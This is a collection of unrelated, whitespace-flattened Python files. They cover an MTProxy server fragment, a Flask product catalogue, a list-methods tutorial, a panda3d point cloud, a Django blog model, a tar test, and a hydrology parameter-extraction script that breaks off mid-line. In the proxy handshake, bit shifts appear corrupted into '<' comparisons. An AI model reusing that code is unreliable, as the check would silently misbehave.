key_iv[:32], key_iv[32:] return decrypt_key, decrypt_iv, encrypt_key, encrypt_iv class SenderProtocol(asyncio.Protocol): def __init__(self, client): super().__init__() self.client = client self.handshaked = asyncio.Event() def connection_made(self, transport): self.transport = transport self.handshake() asyncio.ensure_future(self.start_send()) def data_received(self, data): decrypted_data = self.decryptor.decrypt(data) self.client.to_local_queue.put_nowait(decrypted_data) def handshake(self): random_buf = os.urandom(64) check_list = [0x44414548, 0x54534f50, 0x20544547, 0x4954504f, 0xeeeeeeee] while True: tmp1 = (random_buf[3] < 24) | (random_buf[2] < 16) | (random_buf[1] < 8) | (random_buf[0]) tmp2 = (random_buf[7] < 24) | (random_buf[6] < 16) | (random_buf[5] < 8) | (random_buf[4]) if random_buf[0] != 0xef and (tmp1 not in check_list) and tmp2 != 0x00000000: tmp_bytes_list = list(random_buf) tmp_bytes_list[56] = tmp_bytes_list[57] = tmp_bytes_list[58] = tmp_bytes_list[59] = 0xef random_buf = bytes(tmp_bytes_list) break random_buf = os.urandom(64) # Be careful, The order of these variables is reversed compared to client's. encrypt_key, encrypt_iv, decrypt_key, decrypt_iv = MTProxy.generate_key_iv(buf64=random_buf) self.decryptor = OpenSSLStreamCrypto("aes-256-ctr", key=decrypt_key, iv=decrypt_iv, op=0) self.encryptor = OpenSSLStreamCrypto("aes-256-ctr", key=encrypt_key, iv=encrypt_iv, op=1) encrypted_data = self.encryptor.encrypt(random_buf) encrypted_data = random_buf[:56] + encrypted_data[56:] self.transport.write(encrypted_data) self.handshaked.set() async def start_send(self): await self.handshaked.wait() while True: data = await self.client.to_sender_queue.get() encrypted_data = self.encryptor.encrypt(data) self.transport.write(encrypted_data) try: config = json.loads(open("config.json", 'r').read()) except Exception as e: config = {"port": 443, "secret_key": "0123456789abcdef0123456789abcdef"} port = config.get("port", 443) try: import uvloop asyncio.set_event_loop_policy(uvloop.EventLoopPolicy()) except Exception as e: pass loop = asyncio.get_event_loop() local_addr = "0.0.0.0", port coro = loop.create_server(lambda: MTProxy(config), *local_addr) server = loop.run_until_complete(coro) print('server created ', *local_addr) try: loop.run_forever() except KeyboardInterrupt as e: print('all tasks cancelled') print(asyncio.gather(asyncio.Task.all_tasks()).cancel())
import contentful from flask_paginate import Pagination, get_page_parameter from flask import render_template, request from decouple import config ########## CONTENTFUL ############ SPACE_ID = config('SPACE_ID') ACCESS_TOKEN = config('ACCESS_TOKEN') client = contentful.Client(SPACE_ID, ACCESS_TOKEN) ########## CONTENTFUL ############ PRODUCT_LIMIT = 36 class Products: def search_product(self, search_query, search_form, skip_num): products = client.entries({'limit': PRODUCT_LIMIT, 'content_type': 'samAndCoProducts', 'skip': skip_num, 'fields.title[match]': search_query}) page = request.args.get(get_page_parameter(), type=int, default=1) pagination = Pagination(show_single_page= True, page=page, per_page=36, total=products.total, search=False, record_name='products') return render_template('store.html', products=products, search_form=search_form, pagination=pagination) # All Products def all_products(self, skip_num): products = client.entries({'limit': PRODUCT_LIMIT, 'content_type': 'samAndCoProducts', 'skip': skip_num}) print(products) return products #Sort by Category def get_by_category(self, query, skip_num): products = client.entries({'limit': PRODUCT_LIMIT, 'content_type': 'samAndCoProducts', 'skip': skip_num, 'fields.category[match]':query}) return products def get_product_detail(self, product_id): product = client.entry({product_id}) return product def get_discount_items(self): products = client.entries({'content_type': 'samAndCoProducts', 'fields.category2[match]': 'discount'}) return products
#!/usr/local/bin/python3.8 # Methods are functions that are attached to items # 'append' : append(<appended_item>) my_list = [1, 2, 3] my_list.append(4) # 'insert' : insert(<position>, <appended_item>) my_list.insert(0, 'a') # ['a', 1, 2, 3, 4] # 'index' : tells you the position of an item my_list = ['a', 1, 2, 3, 4] my_list.index('a') # 0 # 'in' keyword finds whether something exists in a list my_list = ['a', 1, 2, 3, 4] 'a' in my_list # True 'a' not in my_list # False 'b' in my_list # False # 'sort' function - sorts out a list in order my_list = [6, 8, 10, 4] sorted(my_list) # 4, 6, 8, 10] # 'reversed' function - reverses the list my_list = [6, 8, 10, 4] reversed(my_list) # not useful: <list_reverseiterator object at 0x7f51ad4eea60> list (reversed(my_list)) # useful list back: [4, 10, 8, 6] ## sort and reverse # to use both, only one type can be used: i.e. int, str, float my_list = [6, 8, 10, 4] list (reversed(sorted(my_list))) # [10, 8, 6, 4]
from panda3d.core import BoundingBox, Point3 # A collection of points class PointCloud: def __init__(self, points = []): self.points = points self.calcBoundingBox() def addPoint(self, point): if point not in self.points: self.points.append(point) self.calcBoundingBox() def removePoint(self, point): if point in self.points: self.points.remove(point) self.calcBoundingBox() def calcBoundingBox(self): self.minX = None self.minY = None self.minZ = None self.maxX = None self.maxY = None self.maxZ = None mins = Point3(99999999) maxs = Point3(-99999999) for point in self.points: if point.x < mins.x: mins.x = point.x if point.y < mins.y: mins.y = point.y if point.z < mins.z: mins.z = point.z if point.x > maxs.x: maxs.x = point.x if point.y > maxs.y: maxs.y = point.y if point.z > maxs.z: maxs.z = point.z if self.minX is None or point.x < self.minX.x: self.minX = point if self.minY is None or point.y < self.minY.y: self.minY = point if self.minZ is None or point.z < self.minZ.z: self.minZ = point if self.maxX is None or point.x > self.maxX.x: self.maxX = point if self.maxY is None or point.y > self.maxY.y: self.maxY = point if self.maxZ is None or point.z > self.maxZ.z: self.maxZ = point self.mins = mins self.maxs = maxs self.boundingBox = BoundingBox(self.mins, self.maxs) self.extents = [ self.minX, self.minY, self.minZ, self.maxX, self.maxY, self.maxZ ]
__author__ = 'apple' # Get Shapefile Fields and Types - Get the user defined fields from osgeo import ogr daShapefile = r"ne1/ne1.shp" # Path your Shapefile dataSource = ogr.Open(daShapefile) daLayer = dataSource.GetLayer(0) layerDefinition = daLayer.GetLayerDefn() print "Name - Type Width Precision" for i in range(layerDefinition.GetFieldCount()): fieldName = layerDefinition.GetFieldDefn(i).GetName() fieldTypeCode = layerDefinition.GetFieldDefn(i).GetType() fieldType = layerDefinition.GetFieldDefn(i).GetFieldTypeName(fieldTypeCode) fieldWidth = layerDefinition.GetFieldDefn(i).GetWidth() GetPrecision = layerDefinition.GetFieldDefn(i).GetPrecision() print fieldName + " - " + fieldType+ " " + str(fieldWidth) + " " + str(GetPrecision)
from django.conf import settings from django.db import models from django.core.urlresolvers import reverse from django.utils.translation import ugettext_lazy as _ class BlogPost(models.Model): title = models.CharField(max_length=40, blank=False, null=False) text = models.TextField(blank=False) author = models.ForeignKey(settings.AUTH_USER_MODEL) private = models.BooleanField(default=False) creation_time = models.DateTimeField(auto_now=True) def __unicode__(self): return self.title def get_absolute_url(self): return reverse('blog_platform.views.display_blogpost', args=(self.author, self.slug)) class Meta: verbose_name = _('BlogPost') verbose_name_plural = _('BlogPosts')
import os import tarfile from art.command import run_command multi_dir = os.path.realpath(os.path.join(os.path.dirname(__file__), "multi")) files_per_name = { "a": {".manifest.json", "a.txt", "aa/a2.txt"}, "b": {".manifest.json", "b.txt"}, } def test_multi(tmpdir): tmpdir = str(tmpdir) suffix = "latest" args = ["--dest", tmpdir, "--suffix", suffix, "--local-source", multi_dir] run_command(args) for name, files in files_per_name.items(): for file in files: assert os.path.isfile(os.path.join(tmpdir, name, suffix, file)) tar_path = os.path.join(tmpdir, "a", suffix, "wrap.tar") with tarfile.open(tar_path, "r") as tf: assert set(tf.getnames()) == files_per_name["a"]
#Extract_Hydro_Params.py #Ryan Spies #ryan.spies@amec.com #AMEC #Description: extracts SAC-SMA/UNITHG/LAG-K parameters values #from CHPS configuration .xml files located in the Config->ModuleConfigFiles #directory and ouputs a .csv file with all parameters #Script was modified from Cody's original script # NOTE: this script only works with the original CHPS SA moduleparfile .xml files... # not the CHPS CALB parameter mods #import script modules import glob import os import re import matplotlib.pyplot as plt import numpy from datetime import datetime from matplotlib.ticker import AutoMinorLocator from matplotlib.ticker import MultipleLocator #----------------------------------------------------------------------------- #START USER INPUT SECTION #Enter RFC RFC = 'APRFC' param_source = 'pre_calb' # choices: 'pre_calb','sa' #Turn on/off model parameter searchs # choices: 'on' or 'off' sac = 'off' snow = 'on' lag_k = 'off' uh = 'off' #Turn on/off plot choices uh_plots = 'on' # choices: 'on' or 'off' -> UNIT-HG plots lag_plots = 'off' # choices: 'on' or 'off' -> LAG/K plots #END USER INPUT SECTION #----------------------------------------------------------------------------- homedir = os.getcwd() if homedir[0:1] != 'P': maindir = homedir[0:8] else: maindir = homedir[0:2] print 'Script is Running...' if param_source == 'pre_calb': folderPath = maindir + '\\NWS\\chps_calb\\' + RFC.lower() + '_calb\\Config\\ModuleParFiles\\*' if param_source == 'sa': folderPath = maindir + '\\NWS\\chps_sa\\' + RFC.lower() + '_sa\\Config\\ModuleParFiles\\*' #folderPath = maindir + '\\NWS\\chps_calb\\' + RFC.lower() + '_calb\\Config\\ModuleParFiles\\*' #SAC-SMA SECTION-------------------------------------------------------------- #loop through SACSMA files in folderPath if sac == 'on': print 'Processing SAC-SMA parameters...' if param_source == 'pre_calb': csv_file = open(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + '_' + RFC + '_SACSMA_Params_' + param_source + '.csv', 'w') if param_source == 'sa': csv_file = open(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + '_' + RFC + '_SACSMA_Params_' + param_source + '.csv', 'w') csv_file.write('BASIN,NAME,REXP,LZPK,LZFPM,PXADJ,RCI,PFREE,ZPERC,RIVA,MAPE_Input,PEADJ,LZTWM,'\ 'RSERV,ADIMP,UZK,SIDE,LZFSM,LZSK,SMZC,UZTWM,UZFWM,PCTIM,EFC,'\ 'JAN_ET,FEB_ET,MAR_ET,APR_ET,MAY_ET,JUN_ET,JUL_ET,AUG_ET,SEP_ET,OCT_ET,NOV_ET,DEC_ET' + '\n') sac_line = 0; basin_count = 0 for filename in glob.glob(os.path.join(folderPath, "SAC*.xml")): #print filename basin_count += 1 #Define output file name name = str(os.path.basename(filename)[:]) name = name.replace('SACSMA_', '') name = name.replace('_UpdateStates.xml', '') spl_name = name.split('_')[1] #print name csv_file.write(name + ',') csv_file.write(spl_name + ',') #Open .xml file and temporary .txt file to write .xml contents to xml_file = open(filename, 'r') txt_file = open(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + name + '.txt', 'w') #Write contents of .xml file to the temporary .txt file for line in xml_file: txt_file.write(line) #Close the open files xml_file.close() txt_file.close() #Open .txt file with .xml contents in read mode and create output .txt file where parameters will be written txt_file = open(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + name + '.txt', 'r') output_file = open(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + name + '_SACSMA_Params.txt', 'w') #Write data headers output_file.write('PARAMETER,VALUE' + '\n') ###REXP #Find line number with REXP value #Line number is saved when loop breaks line_num = 0 for line in txt_file: line_num += 1 if 'REXP' in line: break #Set cursor back to beginning of txt_file that is being read txt_file.seek(0) #Section/line of .txt file with desired parameter value section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)] for line in section: #Write only numbers and decimals to output file line = re.sub("[^0123456789\.\-]", "", line) csv_file.write(line + ',') output_file.write('REXP,' + line + '\n') ###LZPK txt_file.seek(0) line_num=0 for line in txt_file: line_num += 1 if 'LZPK' in line: break txt_file.seek(0) section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)] for line in section: line = re.sub("[^0123456789\.\-]", "", line) csv_file.write(line + ',') output_file.write('LZPK,' + line + '\n') ###LZFPM txt_file.seek(0) line_num=0 for line in txt_file: line_num += 1 if 'LZFPM' in line: break txt_file.seek(0) section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)] for line in section: line = re.sub("[^0123456789\.\-]", "", line) csv_file.write(line + ',') output_file.write('LZFPM,' + line + '\n') ###PXADJ txt_file.seek(0) line_num=0 for line in txt_file: line_num += 1 if 'PXADJ' in line: break txt_file.seek(0) section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)] for line in section: line = re.sub("[^0123456789\.\-]", "", line) csv_file.write(line + ',') output_file.write('PXADJ,' + line + '\n') ###RUNOFF_COMPONENT_INTERVAL txt_file.seek(0) line_num=0 if 'RUNOFF_COMPONENT_INTERVAL' not in txt_file.read(): csv_file.write('N/A' + ',') output_file.write('RUNOFF_COMPONENT_INTERVAL,' + 'N/A' + '\n') else: txt_file.seek(0) for line in txt_file: line_num += 1 if 'RUNOFF_COMPONENT_INTERVAL' in line: break txt_file.seek(0) section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)] for line in section: line = re.sub("[^0123456789\.\-]", "", line) csv_file.write(line + ',') output_file.write('RUNOFF_COMPONENT_INTERVAL,' + line + '\n') ###PFREE txt_file.seek(0) line_num=0 for line in txt_file: line_num += 1 if 'PFREE' in line: break txt_file.seek(0) section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)] for line in section: line = re.sub("[^0123456789\.\-]", "", line) csv_file.write(line + ',') output_file.write('PFREE,' + line + '\n') ###ZPERC txt_file.seek(0) line_num=0 for line in txt_file: line_num += 1 if 'ZPERC' in line: break txt_file.seek(0) section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)] for line in section: line = re.sub("[^0123456789\.\-]", "", line) csv_file.write(line + ',') output_file.write('ZPERC,' + line + '\n') ###RIVA txt_file.seek(0) line_num=0 for line in txt_file: line_num += 1 if 'RIVA' in line: break txt_file.seek(0) section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)] for line in section: line = re.sub("[^0123456789\.\-]", "", line) csv_file.write(line + ',') output_file.write('RIVA,' + line + '\n') ###MAPE_Input txt_file.seek(0) line_num=0 if 'MAPE' not in txt_file.read(): csv_file.write('FALSE' + ',') output_file.write('MAPE_Input,' + 'FALSE' + '\n') else: txt_file.seek(0) for line in txt_file: line_num += 1 if 'MAPE' in line: break txt_file.seek(0) section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)] for line in section: if 'true' in line or 'TRUE' in line or 'True' in line: #line = 'TRUE' csv_file.write('TRUE' + ',') output_file.write('MAPE_Input,' + 'TRUE' + '\n') else: for line in section: if 'false' in line or 'FALSE' in line or 'False' in line: #line = 'TRUE' csv_file.write('FALSE' + ',') output_file.write('MAPE_Input,' + 'FALSE' + '\n') ###PEADJ txt_file.seek(0) line_num=0 for line in txt_file: line_num += 1 if 'PEADJ' in line: break txt_file.seek(0) section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)] for line in section: line = re.sub("[^0123456789\.\-]", "", line) csv_file.write(line + ',') output_file.write('PEADJ,' + line + '\n') ###LZTWM txt_file.seek(0) line_num=0 for line in txt_file: line_num += 1 if 'LZTWM' in line: break txt_file.seek(0) section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)] for line in section: line = re.sub("[^0123456789\.\-]", "", line) csv_file.write(line + ',') output_file.write('LZTWM,' + line + '\n') ###RSERV txt_file.seek(0) line_num=0 for line in txt_file: line_num += 1 if 'RSERV' in line: break txt_file.seek(0) section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)] for line in section: line = re.sub("[^0123456789\.\-]", "", line) csv_file.write(line + ',') output_file.write('RSERV,' + line + '\n') ###ADIMP txt_file.seek(0) line_num=0 for line in txt_file: line_num += 1 if 'ADIMP' in line: break txt_file.seek(0) section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)] for line in section: line = re.sub("[^0123456789\.\-]", "", line) csv_file.write(line + ',') output_file.write('ADIMP,' + line + '\n') ###UZK txt_file.seek(0) line_num=0 for line in txt_file: line_num += 1 if 'UZK' in line: break txt_file.seek(0) section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)] for line in section: line = re.sub("[^0123456789\.\-]", "", line) csv_file.write(line + ',') output_file.write('UZK,' + line + '\n') ###SIDE txt_file.seek(0) line_num=0 for line in txt_file: line_num += 1 if 'SIDE' in line: break txt_file.seek(0) section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)] for line in section: line = re.sub("[^0123456789\.\-]", "", line) csv_file.write(line + ',') output_file.write('SIDE,' + line + '\n') ###LZFSM txt_file.seek(0) line_num=0 for line in txt_file: line_num += 1 if 'LZFSM' in line: break txt_file.seek(0) section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)] for line in section: line = re.sub("[^0123456789\.\-]", "", line) csv_file.write(line + ',') output_file.write('LZFSM,' + line + '\n') ###LZSK txt_file.seek(0) line_num=0 for line in txt_file: line_num += 1 if 'LZSK' in line: break txt_file.seek(0) section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)] for line in section: line = re.sub("[^0123456789\.\-]", "", line) csv_file.write(line + ',') output_file.write('LZSK,' + line + '\n') ###SMZC_INTERVAL txt_file.seek(0) line_num=0 if 'SMZC_INTERVAL' not in txt_file.read(): csv_file.write('N/A' + ',') output_file.write('SMZC_INTERVAL,' + 'N/A' + '\n') else: txt_file.seek(0) for line in txt_file: line_num += 1 if 'SMZC_INTERVAL' in line: break txt_file.seek(0) section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)] for line in section: line = re.sub("[^0123456789\.\-]", "", line) csv_file.write(line + ',') output_file.write('SMZC_INTERVAL,' + line + '\n') ###UZTWM txt_file.seek(0) line_num=0 for line in txt_file: line_num += 1 if 'UZTWM' in line: break txt_file.seek(0) section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)] for line in section: line = re.sub("[^0123456789\.\-]", "", line) csv_file.write(line + ',') output_file.write('UZTWM,' + line + '\n') ###UZFWM txt_file.seek(0) line_num=0 for line in txt_file: line_num += 1 if 'UZFWM' in line: break txt_file.seek(0) section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)] for line in section: line = re.sub("[^0123456789\.\-]", "", line) csv_file.write(line + ',') output_file.write('UZFWM,' + line + '\n') ###PCTIM txt_file.seek(0) line_num=0 for line in txt_file: line_num += 1 if 'PCTIM' in line: break txt_file.seek(0) section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)] for line in section: line = re.sub("[^0123456789\.\-]", "", line) csv_file.write(line + ',') output_file.write('PCTIM,' + line + '\n') ###EFC txt_file.seek(0) line_num=0 for line in txt_file: line_num += 1 if 'EFC' in line: break txt_file.seek(0) section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)] for line in section: line = re.sub("[^0123456789\.\-]", "", line) csv_file.write(line + ',') output_file.write('EFC,' + line + '\n') ###ET_DEMAND_CURVE txt_file.seek(0) line_num=0 for line in txt_file: line_num += 1 if 'row A' in line: break txt_file.seek(0) section = txt_file.readlines()[line_num-1:line_num] for line in section: line = re.sub("[^0123456789\.\-]", "", line) csv_file.write(line + ',') output_file.write('JAN_ET,' + line + '\n') txt_file.seek(0) section = txt_file.readlines()[line_num:line_num+1] for line in section: line = re.sub("[^0123456789\.\-]", "", line) csv_file.write(line + ',') output_file.write('FEB_ET,' + line + '\n') txt_file.seek(0) section = txt_file.readlines()[line_num+1:line_num+2] for line in section: line = re.sub("[^0123456789\.\-]", "", line) csv_file.write(line + ',') output_file.write('MAR_ET,' + line + '\n') txt_file.seek(0) section = txt_file.readlines()[line_num+2:line_num+3] for line in section: line = re.sub("[^0123456789\.\-]", "", line) csv_file.write(line + ',') output_file.write('APR_ET,' + line + '\n') txt_file.seek(0) section = txt_file.readlines()[line_num+3:line_num+4] for line in section: line = re.sub("[^0123456789\.\-]", "", line) csv_file.write(line + ',') output_file.write('MAY_ET,' + line + '\n') txt_file.seek(0) section = txt_file.readlines()[line_num+4:line_num+5] for line in section: line = re.sub("[^0123456789\.\-]", "", line) csv_file.write(line + ',') output_file.write('JUN_ET,' + line + '\n') txt_file.seek(0) section = txt_file.readlines()[line_num+5:line_num+6] for line in section: line = re.sub("[^0123456789\.\-]", "", line) csv_file.write(line + ',') output_file.write('JUL_ET,' + line + '\n') txt_file.seek(0) section = txt_file.readlines()[line_num+6:line_num+7] for line in section: line = re.sub("[^0123456789\.\-]", "", line) csv_file.write(line + ',') output_file.write('AUG_ET,' + line + '\n') txt_file.seek(0) section = txt_file.readlines()[line_num+7:line_num+8] for line in section: line = re.sub("[^0123456789\.\-]", "", line) csv_file.write(line + ',') output_file.write('SEP_ET,' + line + '\n') txt_file.seek(0) section = txt_file.readlines()[line_num+8:line_num+9] for line in section: line = re.sub("[^0123456789\.\-]", "", line) csv_file.write(line + ',') output_file.write('OCT_ET,' + line + '\n') txt_file.seek(0) section = txt_file.readlines()[line_num+9:line_num+10] for line in section: line = re.sub("[^0123456789\.\-]", "", line) csv_file.write(line + ',') output_file.write('NOV_ET,' + line + '\n') txt_file.seek(0) section = txt_file.readlines()[line_num+10:line_num+11] for line in section: line = re.sub("[^0123456789\.\-]", "", line) csv_file.write(line + ',') output_file.write('DEC_ET,' + line + '\n') txt_file.close() output_file.close() #Delete temporary .txt file holding .xml contents os.remove(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + name + '.txt') os.remove(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + name + '_SACSMA_Params.txt') csv_file.write('\n') print 'Total SAC-SMA files extracted: ' + str(basin_count) csv_file.close() ############################################################################################################################################################### #SNOW-17 SECTION--------------------------------------------------------------- #loop through SACSMA files in folderPath if snow == 'on': print 'Processing SNOW-17 parameters...' csv_file = open(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + '_' + RFC + '_SNOW17_Params_' + param_source + '.csv', 'w') csv_file.write('BASIN,NAME,ALAT,ELEV,TAELEV,PXADJ,SCF,MFMAX,MFMIN,UADJ,SI,NMF,TIPM,'\ 'MBASE,PXTEMP,PLWHC,DAYGM,MV,SASC_INT,SNSG_INT,SWE_INT,SCTOL,WETOL,' + '\n') for filename in glob.glob(os.path.join(folderPath, "SNOW*.xml")): #print filename #Define output file name name = str(os.path.basename(filename)[:]) name = name.replace('SNOW17_', '') name = name.replace('_UpdateStates.xml', '') spl_name = name.split('_')[1] #print name csv_file.write(name + ',') csv_file.write(spl_name + ',') #Open .xml file and temporary .txt file to write .xml contents to xml_file = open(filename, 'r') txt_file = open(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + name + '.txt', 'w') #Write contents of .xml file to the temporary .txt file for line in xml_file: txt_file.write(line) #Close the open files xml_file.close() txt_file.close() #Open .txt file with .xml contents in read mode and create output .txt file where parameters will be written txt_file = open(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + name + '.txt', 'r') output_file = open(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + name + '_SNOW17_Params.txt', 'w') #Write data headers output_file.write('PARAMETER,VALUE' + '\n') ###ALAT #Find line number with ALAT value #Line number is saved when loop breaks line_num = 0 for line in txt_file: line_num += 1 if 'ALAT' in line: break #Set cursor back to beginning of txt_file that is being read txt_file.seek(0) #Section/line of .txt file with desired parameter value section = txt_file.readlines()[line_num:line_num+1] for line in section: #Write only numbers and decimals to output file line = re.sub("[^0123456789\.\-]", "", line) csv_file.write(line + ',') output_file.write('ALAT,' + line + '\n') ###ELEV txt_file.seek(0) line_num=0 for line in txt_file: line_num += 1 if 'ELEV' in line: break txt_file.seek(0) section = txt_file.readlines()[line_num:line_num+1] for line in section: line = re.sub("[^0123456789\.\-]", "", line) csv_file.write(line + ',') output_file.write('ELEV,' + line + '\n') ###TAELEV txt_file.seek(0) line_num=0 for line in txt_file: line_num += 1 if 'TAELEV' in line: break txt_file.seek(0) section = txt_file.readlines()[line_num:line_num+1] for line in section: line = re.sub("[^0123456789\.\-]", "", line) csv_file.write(line + ',') output_file.write('TAELEV,' + line + '\n') ###PXADJ txt_file.seek(0) line_num=0 for line in txt_file: line_num += 1 if 'PXADJ' in line: break txt_file.seek(0) section = txt_file.readlines()[line_num:line_num+1] for line in section: line = re.sub("[^0123456789\.\-]", "", line) csv_file.write(line + ',') output_file.write('PXADJ,' + line + '\n') ###SCF txt_file.seek(0) line_num=0 for line in txt_file: line_num += 1 if 'SCF' in line: break txt_file.seek(0) section = txt_file.readlines()[line_num:line_num+1] for line in section: line = re.sub("[^0123456789\.\-]", "", line) csv_file.write(line + ',') output_file.write('SCF,' + line + '\n') ###MFMAX txt_file.seek(0) line_num=0 for line in txt_file: line_num += 1 if 'MFMAX' in line: break txt_file.seek(0) section = txt_file.readlines()[line_num:line_num+1] for line in section: line = re.sub("[^0123456789\.\-]", "", line) csv_file.write(line + ',') output_file.write('MFMAX,' + line + '\n') ###MFMIN txt_file.seek(0) line_num=0 for line in txt_file: line_num += 1 if 'MFMIN' in line: break txt_file.seek(0) section = txt_file.readlines()[line_num:line_num+1] for line in section: line = re.sub("[^0123456789\.\-]", "", line) csv_file.write(line + ',') output_file.write('MFMIN,' + line + '\n') ###UADJ txt_file.seek(0) line_num=0 for line in txt_file: line_num += 1 if 'UADJ' in line: break txt_file.seek(0) section = txt_file.readlines()[line_num:line_num+1] for line in section: line = re.sub("[^0123456789\.\-]", "", line) csv_file.write(line + ',') output_file.write('UADJ,' + line + '\n') ###SI txt_file.seek(0) line_num=0 for line in txt_file: line_num += 1 if 'SI' in line: break txt_file.seek(0) section = txt_file.readlines()[line_num:line_num+1] for line in section: line = re.sub("[^0123456789\.\-]", "", line) csv_file.write(line + ',') output_file.write('SI,' + line + '\n') ###NMF txt_file.seek(0) line_num=0 for line in txt_file: line_num += 1 if 'NMF' in line: break txt_file.seek(0) section = txt_file.readlines()[line_num:line_num+1] for line in section: line = re.sub("[^0123456789\.\-]", "", line) csv_file.write(line + ',') output_file.write('NMF,' + line + '\n') ###TIPM txt_file.seek(0) line_num=0 for line in txt_file: line_num += 1 if 'TIPM' in line: break txt_file.seek(0) section = txt_file.readlines()[line_num:line_num+1] for line in section: line = re.sub("[^0123456789\.\-]", "", line) csv_file.write(line + ',') output_file.write('TIPM,' + line + '\n') ###MBASE txt_file.seek(0) line_num=0 for line in txt_file: line_num += 1 if 'MBASE' in line: break txt_file.seek(0) section = txt_file.readlines()[line_num:line_num+1] for line in section: line = re.sub("[^0123456789\.\-]", "", line) csv_file.write(line + ',') output_file.write('MBASE,' + line + '\n') ###PXTEMP txt_file.seek(0) line_num=0 for line in txt_file: line_num += 1 if 'PXTEMP' in line: break txt_file.seek(0) section = txt_file.readlines()[line_num:line_num+1] for line in section: line = re.sub("[^0123456789\.\-]", "", line) csv_file.write(line + ',') output_file.write('PXTEMP,' + line + '\n') ###PLWHC txt_file.seek(0) line_num=0 for line in txt_file: line_num += 1 if 'PLWHC' in line: break txt_file.seek(0) section = txt_file.readlines()[line_num:line_num+1] for line in section: line = re.sub("[^0123456789\.\-]", "", line) csv_file.write(line + ',') output_file.write('PLWHC,' + line + '\n') ###DAYGM txt_file.seek(0) line_num=0 for line in txt_file: line_num += 1 if 'DAYGM' in line: break txt_file.seek(0) section = txt_file.readlines()[line_num:line_num+1] for line in section: line = re.sub("[^0123456789\.\-]", "", line) csv_file.write(line + ',') output_file.write('DAYGM,' + line + '\n') ###MV txt_file.seek(0) line_num=0 for line in txt_file: line_num += 1 if 'MV' in line: break txt_file.seek(0) section = txt_file.readlines()[line_num:line_num+1] for line in section: line = re.sub("[^0123456789\.\-]", "", line) csv_file.write(line + ',') output_file.write('MV,' + line + '\n') ###SASC_OUTPUT_TS_INTERVAL txt_file.seek(0) line_num=0 for line in txt_file: line_num += 1 if 'SASC_OUTPUT_TS_INTERVAL' in line: break txt_file.seek(0) section = txt_file.readlines()[line_num:line_num+1] for line in section: line = re.sub("[^0123456789\.\-]", "", line) csv_file.write(line + ',') output_file.write('SASC_OUTPUT_TS_INTERVAL,' + line + '\n') ###SNSG_OUTPUT_TS_INTERVAL txt_file.seek(0) line_num=0 for line in txt_file: line_num += 1 if 'SNSG_OUTPUT_TS_INTERVAL' in line: break txt_file.seek(0) section = txt_file.readlines()[line_num:line_num+1] for line in section: line = re.sub("[^0123456789\.\-]", "", line) csv_file.write(line + ',') output_file.write('SNSG_OUTPUT_TS_INTERVAL,' + line + '\n') ###SWE_OUTPUT_TS_INTERVAL txt_file.seek(0) line_num=0 for line in txt_file: line_num += 1 if 'SWE_OUTPUT_TS_INTERVAL' in line: break txt_file.seek(0) section = txt_file.readlines()[line_num:line_num+1] for line in section: line = re.sub("[^0123456789\.\-]", "", line) csv_file.write(line + ',') output_file.write('SWE_OUTPUT_TS_INTERVAL,' + line + '\n') ###SCTOL txt_file.seek(0) line_num=0 for line in txt_file: line_num += 1 if 'SCTOL' in line: break txt_file.seek(0) section = txt_file.readlines()[line_num:line_num+1] for line in section: line = re.sub("[^0123456789\.\-]", "", line) csv_file.write(line + ',') output_file.write('SCTOL,' + line + '\n') ###WETOL txt_file.seek(0) line_num=0 for line in txt_file: line_num += 1 if 'WETOL' in line: break txt_file.seek(0) section = txt_file.readlines()[line_num:line_num+1] for line in section: line = re.sub("[^0123456789\.\-]", "", line) csv_file.write(line + ',') output_file.write('WETOL,' + line + '\n' + '\n') ###AREA_DEPLETION_CURVE output_file.write('\n' + 'AREA_DEPLETION_CURVE' + '\n') txt_file.seek(0) i = 0 for line in txt_file: if 'row A' in line and 'B=' not in line: i += 1 line = re.sub("[^0123456789\.\-]", "", line) output_file.write(str(i) + ',' + line + '\n') ###AREA_ELEVATION_CURVE output_file.write('\n' + 'AREA_ELEVATION_CURVE' + '\n') txt_file.seek(0) AREA = [] ELEV = [] for line in txt_file: if 'row A' in line and 'B=' in line: line = re.sub("[^0123456789\.\-\"]", "", line) line = line.replace('""', ',') line = line.replace ('"', 